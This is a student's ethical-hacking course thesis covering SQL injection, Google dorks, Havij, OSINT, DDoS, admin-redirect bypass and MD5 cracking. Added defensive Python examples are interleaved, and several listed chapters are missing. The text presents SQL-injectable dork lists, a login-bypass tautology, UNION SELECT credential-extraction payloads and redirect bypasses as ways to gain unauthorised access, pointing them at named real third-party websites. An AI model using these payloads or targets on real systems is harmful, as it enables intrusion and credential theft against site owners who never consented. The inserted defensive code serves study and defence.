Ethical hacking
A thesis submitted in partial fulfillment of the requirements for the course of Ethical hacking
By MD TANJIM HOSSAIN
On Jun 22
Arena Web Security
Declaration by student
I, MD Tanjim Hossain, currently a Class 10 student of Darul Ulum Alia Madrashai, hereby
declare that the work presented herein is original work done by me under the supervision of
Fahim Al Tanjim and has not been published or submitted elsewhere for the requirement of a
degree programme. Any literature, data or work done by others and cited within this thesis has
been given due acknowledgement and is listed in the reference section.
MD Tanjim Hossain
Place: Arena Web Security Date:
Certificate
Certified that the thesis entitled “Ethical Hacking”, submitted by Tanjim Hossain towards
partial fulfillment of the course of ethical hacking run by the institution Arena Web
Security, is based on the investigation and learning done so far from the beginning of the
course, carried out under our guidance. The thesis therefore has not been submitted for the
academic award of any other university or institution.
Countersigned
(Tanjim Al Fahim), Supervisor
(MD Tanjim Hossain), Batch: 38
Abstract:
The apparatus of hacking refers to the evolution of the programs required for coding
purposes, which in turn gives way to more robust security coupled with better efficiency. On
the other hand, excess and obsession with a particular interest can lead to problems. Ethical
hacking is today a common and favoured process for analysing the security systems and
programs of an organisation. It runs in parallel with security assessment, red teaming,
intrusion testing, and vulnerability assessment. The following points will help the reader
understand more about ethical hacking and why it is needed.
Keywords:
Acknowledgement
I would like to express my sincere gratitude to our honourable course instructor and
supervisor Tanjim Al Fahim Sir, and also Jewel Sir and all the moderators and admins for
their continuous advice, effort and invaluable suggestions throughout the research.
I am really grateful to them.
I would also like to thank all my course mates on this course who advised, helped and
made suggestions whenever I got stuck at some point during the entire course.
Thank you.
Table Of Contents
CHAPTER 1 BASIC SQL INJECTION AND GOOGLE DORKING
CHAPTER 2 OSINT AND FORENSIC
CHAPTER 3 HAVIJ AND URL STRUCTURE
CHAPTER 4 NO REDIRECT
CHAPTER 5 CRYPTOGRAPHY
CHAPTER 6 MANUAL SQL INJECTION
CHAPTER 7 WAF BYPASS
CHAPTER 8 XSS
CHAPTER 9 LOCAL FILE INCLUSION (LFI)
CHAPTER 10 REMOTE CODE EXECUTION (RCE)
CHAPTER 11 FILE UPLOAD VULNERABILITY
CHAPTER 12 CROSS SITE REQUEST FORGERY (CSRF)
CHAPTER 13 KALI LINUX AND TOOLS
CHAPTER 14 RECON/INFORMATION GATHERING
CHAPTER 15 PENETRATION TESTING
CONCLUSION
Class-01: (Basic SQL Injection)
Basic SQL Injection
SQL injection is a code injection technique that can sometimes be enough to destroy the
database behind a website. SQL injection is one of the most common web hacking techniques.
SQL injection usually occurs when we ask a user for input, such as their username or user ID,
and instead of a name or ID the user gives us an SQL statement that we then unknowingly run on
our database.
Before we look at how basic SQL injection occurs, we first have to know what a vulnerability
in a website means.
Web vulnerability: A website vulnerability is a weakness in the code of a website or web
application that allows an attacker to gain some level of control over the site, and possibly
over the hosting server. If a website has such a weakness, whether of low or high severity,
there is a possibility that bad actors or attackers will attack that website.
To find websites that carry such vulnerabilities we take the help of Google dorks. So what
is a Google dork?
Google dork: Google dorking is a computer hacking technique that uses Google Search and
other Google applications to find security holes in the configuration and code that
websites use.
Using Google dorks we can find websites that contain such vulnerabilities; the first step is
to search Google with a dork. A short list of Google dorks follows:
Google dorks compilation to find SQL injections:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:view_product.php?id=
There are different ways to attack and gain access to a website; in this part we have learned
about basic SQL injection.
User: 1' or '1'='1
Pass: 1' or '1'='1
The above username and password are what is entered to gain access to the website.
So how does it work?
Every website has a database. If we enter a wrong username and a false query, the database
immediately rejects it and alerts us. But if we put the above query in the username and
password fields, the condition '1'='1' is always true, so the database evaluates the whole
query as true and gives the attacker unauthorised access. The website does not recognise the
false query, and the hacker easily gets access with the 1=1 condition.
Example:
We can use the below link as an example:
https://sidm.in/admin/login
Figure 1
Figure 2
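As an added illustration (not code from the thesis), the Python snippet below builds the kind of login query described above in two ways: by pasting the input straight into the SQL text, which is what makes the 1=1 trick work, and with a parameterised query, which is the fix. Everything in it, including the in-memory users table and the admin/s3cret credentials, is constructed for the demonstration; the password is kept in plaintext only to keep the example to one table.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a site's user table (one admin account)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext password only for brevity of the demo; real sites store a salted hash.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def build_vulnerable_sql(user, pw):
    # The input is pasted into the query text, so a quote in the input closes the
    # string literal and whatever follows is parsed as SQL, not as data.
    return (
        "SELECT id FROM users WHERE username = '" + user
        + "' AND password = '" + pw + "'"
    )


def login_vulnerable(conn, user, pw):
    """Vulnerable check: returns True whenever the concatenated query matches a row."""
    row = conn.execute(build_vulnerable_sql(user, pw)).fetchone()
    return row is not None


def login_safe(conn, user, pw):
    """Hardened check: placeholders keep the values out of the SQL grammar."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print(build_vulnerable_sql(payload, payload))
    print("vulnerable login accepted:", login_vulnerable(db, payload, payload))
    print("parameterised login accepted:", login_safe(db, payload, payload))
```

With the tautology in both fields the concatenated query reads `... username = '1' or '1'='1' AND password = '1' or '1'='1'`, whose final `or '1'='1'` is true for every row, so the vulnerable function finds a match; the parameterised version looks for a user literally named `1' or '1'='1` and finds nothing.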
Class-02: (Havij and Grabify)
Havij
Havij is a tool that can be used to extract information from the database we want to
exploit. For example, if we choose the username and password columns, it shows them for a
website that has this vulnerability.
The same dorks that we used earlier for basic SQL injection are used with Havij as well.
It is another method of getting access to a website, but in this case we need a piece of
software to obtain the username and password of the website we have targeted for
unauthorised access. So at the very beginning we need to find such websites with a Google
dork.
Naturally, we should try access on a website that has the vulnerability.
To work with Havij, keep in mind that if the URL of the website begins with https:// we must
remove the "s" and enter only http:// in the search box.
Havij only works on websites whose PHP page takes a numeric id with a value such as 1, 2, 3
or any other number, for example php?id=29.
Some Dork List
1: intitle:"index" of "admin" site:.in or another domain name
2: intitle:"index" of "admin" "framework" site:.in or another domain name
3: intitle:"index" of "admin" "pdf" site:.in or another domain name
4: intitle:"index" of "admin" "gallery" site:.in or another domain name
5: intitle:"index" of "admin" "image" site:.in or another domain name
6: intitle:"index" of "admin" "upload" site:.in or another domain name
7: intitle:"index" of "admin" "banner" site:.in or another domain name
8: intitle:"index" of "admin" "file" site:.in or another domain name
9: intitle:"index" of "admin" "page" site:.in or another domain name
10: intitle:"index" of "admin" "news" site:.in or another domain name
Example: we can use the below link to provide an example.
http://www.dss.kannuruniversity.ac.in/single-news.php?id=6
Figure 3
Grabify
This tool is useful for gathering information from a link or URL of a website. It can obtain
information about a user's IP address, location (country, city) and so on. We can view the
full list of features here.
Figure 4
Figure 5
Class-03: (OSINT, Domain Info and Photo Forensics)
OSINT
The full form of OSINT is open source intelligence.
OSINT is a methodology of collecting and analysing information/data from publicly
available sources to be used as intelligence against a target. We can use OSINT to learn
someone's location, name, number, IP address and other public or private details.
What OSINT yields depends on how you use the available information.
In the intelligence community, the term "open" refers to overt, publicly available sources
(as opposed to covert or clandestine sources).
OSINT is also about learning to use OSINT tools to better understand our own digital
footprint.
Example:
Google search by image: We can use Google image search to get information about a picture
just by uploading it, as in the picture shown below.
It is not guaranteed that one will get every piece of information from Google search by
image; we may have to go through other techniques to find information from a picture.
images.google.com
Figure 6
Figure 7
Domain Big Data
It is an online investigation tool through which we can obtain the IP address, location,
email and similar information about a domain.
Example:
https://domainbigdata.com
Figure 8
Figure 9
Photo Forensics
It is another online tool used in the investigation process. It is useful for zooming into a
picture to read the small written details in it, so that the picture can be identified more
precisely.
Example:
https://29a.ch/photo-forensics
Figure 10
Class-04: (DDOS ATTACK)
Distributed network attacks are often referred to as Distributed Denial of Service (DDoS)
attacks. This type of attack takes advantage of the specific capacity limits that apply to any
network resource, such as the infrastructure that serves a company's website. The DDoS attack
sends many requests to the attacked web resource with the aim of exceeding the website's
capacity to handle them, and so prevents the website from functioning correctly.
Example: This is a DDoS attack tool, which is used to bring a website down through continuous
requests that overwhelm the website's server.
ACUNETIX WEB VULNERABILITY SCANNER:
It is a tool used for finding the vulnerabilities and weaknesses of a website. With this tool
we can learn which part of a website contains a bug.
Example:
Figure 11
Figure 12
Class-05: (No Redirect)
No-redirect
Before we go into the NoRedirect topic we have to know about cookies and sessions.
Cookies and sessions are both used to store information. A cookie is stored only on the
client-side machine, while a session keeps its data on the server and only a session
identifier on the client. A session creates a file in a temporary directory on the server
where the registered session variables and their values are stored.
NoRedirect is a Firefox/SeaMonkey extension that lets the user take control of HTTP
redirects. It can be used to interdict an ISP's DNS search redirection hijacks, preview/screen
"shortened" URLs, stop the annoying redirection of "smart" error pages, etc. So what is HTTP?
It stands for "Hypertext Transfer Protocol". HTTP is the protocol used to transfer data over
the web. It is part of the Internet protocol suite and defines commands and services used for
transmitting webpage data. HTTP uses a client-server model.
Generally, with the help of the NoRedirect add-on we block redirects to the login page URL,
after which we can go directly to the admin page, because the redirect to the login page has
been blocked. Blocking the login page alone does not guarantee entry to the dashboard. If we
cannot enter the dashboard even after blocking the redirect, we have to find the other pages
of that admin area, and to do that we take help from a tool.
While using this tool we remove the part of the URL after "admin" and place the remainder in
the tool's search bar. For example:
If access to that website is possible, the tool shows the word "found" in green beside the
URL, meaning that URL can be used to reach the admin dashboard. Even so, not every URL marked
with a green "found" will actually get us into the dashboard.
This method will not work everywhere; we have to try different techniques to get access to a
website.
Example:
Using the NoRedirect add-on we have blocked the redirect to the admin login page.
After that we search with the same link below, removing the letters after "admin". If it still
does not take us to the dashboard, we have to look for another address for the admin panel,
for which we go to the next step below.
http://www.andamanisland.in/admin/index.php
Figure 13
We go to the link below, enter the address with the letters after "admin" removed, and put it
in the search box.
http://elearn.psyec.edu.in/plus.php
Figure 14
Then we search for the admin panel with another admin name that we have found from the Cyber
71 exploit tool. Only URLs with "Found" written in green can be used for the search.
Figure 15
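The defender's lesson of this class is that a redirect is not an access control. As an added example (not code from the thesis or from the NoRedirect project), the plain-Python WSGI handlers below contrast two admin pages: one that emits the redirect header but keeps generating the protected HTML (the assumed equivalent of a PHP script calling header("Location: ...") without exit, so a redirect-blocking extension simply displays the body), and one that decides authorisation on the server and sends an empty body. The session cookie scheme, the SECRET value and the call() driver are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed demo secret; a real application loads this from configuration.
SECRET = b"constructed-demo-secret"
ADMIN_HTML = b"<h1>Admin dashboard</h1><p>secret settings</p>"


def make_session_cookie(username):
    """Session identifier = username plus an HMAC tag, so the client cannot forge it."""
    tag = hmac.new(SECRET, username.encode(), hashlib.sha256).hexdigest()
    return username + "." + tag


def current_user(environ):
    """Return the user named by a valid 'session' cookie, or None if absent/forged."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name != "session" or "." not in value:
            continue
        user, _, tag = value.rpartition(".")
        expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
        if hmac.compare_digest(tag, expected):
            return user
    return None


def admin_leaks_before_redirect(environ, start_response):
    # Weak pattern: the 302 header is sent, but page generation continues, so the
    # anonymous response still carries the whole dashboard. Blocking the redirect
    # in the browser reveals it.
    if current_user(environ) is None:
        start_response("302 Found", [("Location", "/login"), ("Content-Type", "text/html")])
        return [ADMIN_HTML]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [ADMIN_HTML]


def admin_server_side_check(environ, start_response):
    # Correct pattern: the authorisation decision is taken before any protected bytes
    # are produced, and the anonymous response body is empty, so there is nothing for
    # a redirect-blocking extension to display.
    if current_user(environ) is None:
        start_response("302 Found", [("Location", "/login"), ("Content-Type", "text/plain")])
        return [b""]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [ADMIN_HTML]


def call(app, cookie=None):
    """Minimal WSGI driver so both handlers can be exercised without a web server."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin"}
    if cookie:
        environ["HTTP_COOKIE"] = cookie
    captured = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    for app in (admin_leaks_before_redirect, admin_server_side_check):
        status, headers, body = call(app)
        print(app.__name__, status, headers.get("Location"), body)
```

Both handlers answer an anonymous request with 302 and the same Location header, so from the outside they look identical; only the body differs, and the body is exactly what the extension lets the browser render. A forged cookie such as session=admin.deadbeef fails the HMAC check and is treated as anonymous.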
Class-06: (MANUAL SQL INJECTION)
Manual SQL Injection
Every website has a database, where it stores all its information on its server. In every
database the main information is stored in columns and rows. So first of all we find out how
many columns this website's query has by using:
6 Order by 1-- (INT)
6' Order by 1--+ (STRING) [6 is the id value, as in php?id=6, and 1 is the number of columns]
6 Union select 1,2,3,4,5,6-- (INT)
6' Union select 1,2,3,4,5,6--+ (STRING)
[The numbers 1-6 are listed in sequence. One might have to prefix the id with - or .,
like id=-6 or id=.6]
After this step we determine which column is the most vulnerable and use that column to get
the database. The following steps are used for the attack.
Union based -> DIOS MySQL -> DIOS by WAF (if one does not work, try another one)
(Copy the DIOS link and execute it in a new tab)
Then get the data from those columns:
6 Union select 1,2,3,4,5,group_concat(column name) from (__table name__)-- (INT)
6' Union select 1,2,3,4,5,group_concat(column name) from (__table name__)--+ (STRING)
Example: For an example we can use the following link.
http://www.chocolatekids.co.in/gallery.php?id=-5' union select
1,group_concat(ad_name,0x3d,ad_pwd),3 from admin --+
Figure 16
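From the detection side, the added example below (not code from the thesis) scans web-server access log lines for the probe shapes this class describes, the ORDER BY count, the UNION SELECT and group_concat() extraction, together with the '1'='1 tautology from Class 1. The log lines, IP addresses, URLs and rule names are constructed for the demonstration; a real deployment would feed it the server's own combined-format access log.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample of combined-format access log lines (Apache/nginx style).
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jun/2022:10:00:01 +0000] "GET /gallery.php?id=6 HTTP/1.1" 200 512
203.0.113.5 - - [22/Jun/2022:10:00:02 +0000] "GET /gallery.php?id=6%20order%20by%201-- HTTP/1.1" 200 512
203.0.113.5 - - [22/Jun/2022:10:00:03 +0000] "GET /gallery.php?id=-6%27%20union%20select%201,2,3--+ HTTP/1.1" 500 0
198.51.100.7 - - [22/Jun/2022:10:00:04 +0000] "GET /admin/login?user=1%27%20or%20%271%27%3D%271 HTTP/1.1" 200 300
192.0.2.9 - - [22/Jun/2022:10:00:05 +0000] "GET /news.php?id=12 HTTP/1.1" 200 800
"""

# ip, ident, user, [timestamp], "method path protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Rules are matched against the URL-decoded path, so %27 / %20 / + do not hide anything.
RULES = [
    ("order-by probe", re.compile(r"\border\s+by\s+\d", re.I)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
]


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "time": ts, "method": method, "path": path,
            "decoded": unquote_plus(path), "status": int(status)}


def classify(decoded_path):
    """Name of the first rule the decoded request matches, or None if it looks clean."""
    for name, rx in RULES:
        if rx.search(decoded_path):
            return name
    return None


def scan_log(text):
    """Return the parsed records that matched a rule, each tagged with the rule name."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec["decoded"])
        if rule:
            rec["rule"] = rule
            hits.append(rec)
    return hits


def suspects_by_ip(text):
    """Count flagged requests per source address, for alerting or blocking decisions."""
    return Counter(h["ip"] for h in scan_log(text))


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["status"], h["rule"], h["decoded"])
    print(suspects_by_ip(SAMPLE_LOG))
```

The decode step matters: the ORDER BY and UNION probes arrive percent-encoded and with the trailing `--+` comment, and the tautology arrives as `%27` and `%3D`, so a rule applied to the raw path would miss all three. The 500 on the UNION line is the other signal a defender should correlate with these hits.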
Class-07: (CRYPTOGRAPHY)
Cryptography is the science of using mathematics to encrypt and decrypt data. Cryptography
enables you to store sensitive information or transmit it across insecure networks (like the
Internet) so that it cannot be read by anyone except the intended recipient.
While cryptography is the science of securing data, cryptanalysis is the science of analysing
and breaking secure communication. Classical cryptanalysis involves an interesting
combination of analytical reasoning, application of mathematical tools, pattern finding,
patience, determination, and luck. Cryptanalysts are also called attackers.
Cryptology embraces both cryptography and cryptanalysis.
We should also know the terms encryption and decryption before going further into details.
Encryption: In cryptography, encryption is the process of encoding information. This process
converts the original representation of the information, known as plaintext, into an
alternative form known as ciphertext.
Decryption: Decryption is the process of converting encoded/encrypted data back into a form
that is readable and understood by a human or a computer. It is performed by undoing the
encryption manually or by using the keys that were used to encrypt the original data.
Example: We can use the link below to mirror anything; we will encrypt some data with it:
https://www.calcresult.com/misc/cyphers/mirror.html
Figure 17
Then we will copy the MD5 hash and decrypt it with the following link.
https://hashtoolkit.com/decrypt-hash/
Figure 18
https://crackstation.net/
Figure 19
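The sites linked above can "decrypt" an MD5 hash only because a hash is not encryption: there is no key to recover, and the site looks the digest up in a precomputed table of hashes of common inputs. The added example below (not code from the thesis or from those sites) reproduces that lookup with a tiny constructed wordlist and contrasts it with a salted, iterated password hash (PBKDF2-HMAC-SHA256 from Python's standard library) that such a table cannot match. The WORDLIST and the iteration count are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the billions of entries a lookup site holds.
WORDLIST = ["123456", "password", "letmein", "qwerty", "admin123"]
PBKDF2_ITERATIONS = 200_000  # constructed; tune to your hardware's cost budget


def md5_hex(text):
    """Unsalted MD5, the form the lookup sites expect."""
    return hashlib.md5(text.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute digest -> word once; every later 'decrypt' is a dictionary lookup."""
    return {md5_hex(w): w for w in words}


def lookup_md5(digest, table):
    """Return the word whose MD5 equals digest, or None if it was never precomputed."""
    return table.get(digest.lower())


def hash_password(password, salt=None):
    """Store a password as salt$derived_key using a salted, slow KDF instead of bare MD5."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_password(password, stored):
    """Recompute the derived key with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    digest = md5_hex("letmein")
    print("md5", digest, "->", lookup_md5(digest, table))
    # Two users with the same password get identical MD5s but different PBKDF2 strings.
    print(hash_password("letmein"))
    print(hash_password("letmein"))
```

Because every user who picked "letmein" has the same MD5, one table hit unmasks all of them; with a per-user random salt the stored values differ, the table is useless, and the iteration count makes each guess expensive.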
Conclusions: I would like to say that this course has enriched my knowledge of ethical
hacking, not to harm others but to know how an exploit or attack might happen, so
that we can keep ourselves alert to any kind of attack by attackers. The prime purpose of
ethical hacking is to prevent sensitive data from falling into enemy hands. It safeguards your
company from blackmail by those willing to exploit the vulnerabilities. Via real-world
testing, you can enhance your digital network security and prevent security breaches.